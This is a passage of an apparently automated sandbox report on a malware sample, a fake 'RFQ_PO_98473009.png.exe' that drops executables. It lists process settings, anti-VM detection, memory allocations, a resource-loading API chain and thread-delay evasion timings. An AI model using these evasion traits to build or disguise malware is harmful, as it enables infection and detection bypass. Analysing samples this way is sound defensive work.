                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: RFQ_PO_98473009.png.exe PID: 7376, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: lVbhkOPdhyxT.exe PID: 8052, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeMemory allocated: 1450000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeMemory allocated: 16B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeMemory allocated: 7C20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeMemory allocated: 8C20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeMemory allocated: 8DC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeMemory allocated: 9DC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeMemory allocated: 2000000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeMemory allocated: 2330000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeMemory allocated: 2270000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeMemory allocated: 24E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeMemory allocated: 44E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeMemory allocated: 2E60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeMemory allocated: 2E60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeMemory allocated: 4E60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeMemory allocated: 7630000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeMemory allocated: 8630000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeMemory allocated: 87C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeMemory allocated: 97C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeMemory allocated: 2160000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeMemory allocated: 24E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeMemory allocated: 23E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeMemory allocated: 2120000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeMemory allocated: 2530000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeMemory allocated: 21A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599875
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599764
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599652
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599531
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599422
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599309
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599187
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599078
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598968
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598859
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598750
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598640
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598531
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598421
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598312
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598202
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598093
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597982
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597840
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597710
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597594
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597469
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597359
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597250
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597140
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597031
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596922
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596812
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596703
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596593
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596484
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596375
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596232
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596109
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595890
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595781
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595672
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595562
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595453
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595343
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595234
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595125
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595015
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594906
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594797
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594672
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594562
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594452
